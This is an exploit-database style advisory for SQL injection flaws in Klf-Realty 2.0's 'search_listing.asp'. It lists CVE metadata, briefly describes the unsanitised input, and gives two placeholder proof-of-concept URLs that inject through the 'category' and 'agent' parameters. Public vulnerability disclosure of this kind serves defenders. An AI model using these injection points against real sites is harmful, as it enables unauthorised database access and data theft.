Klf-Realty 2.0 - 'search_listing.asp' Multiple SQL Injections
Author: laurent gaffie
type: webapps
platform: asp
port:
date_added: 2006-11-20
date_updated: 2013-10-23
verified: 1
codes: CVE-2006-6342;OSVDB-31932
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/21199/info
Klf-Realty is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/search_listing.asp?category='[sql]
http://www.example.com/search_listing.asp?agent='[sql]